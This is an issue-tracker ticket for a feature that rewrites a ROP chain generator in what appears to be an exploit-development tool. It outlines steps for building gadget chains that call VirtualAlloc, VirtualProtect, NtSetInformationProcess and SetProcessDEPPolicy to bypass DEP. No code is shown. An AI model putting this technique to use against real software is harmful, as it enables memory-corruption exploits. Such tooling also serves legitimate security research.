Feature #156
rewrite rop routine
| Status: | Committed | Start date: | 01 Aug 2011 | |
|---|---|---|---|---|
| Priority: | Normal | Due date: | ||
| Assignee: | Peter | % Done: | 100% | |
| Category: | - | |||
| Target version: | v1.2 |
Description
1. build dictionary with desired register contents for each function
(virtualalloc, virtualprotect, ntsetinformationprocess)
2. build gadgets for each step, with taint list
3. reorder gadgets to satisfy taints
4. build chain, compute compensate and retn offset support at runtime
History
#1 Updated by Peter almost 2 years ago
- Status changed from New to Committed
- Target version changed from v1.2 to v1.3
- % Done changed from 0 to 100
done
rop generator now produces chains for
- virtualalloc
- virtualprotect
- ntsetinformationprocess
- setprocessdeppolicy
#2 Updated by Peter almost 2 years ago
- Target version changed from v1.3 to v1.2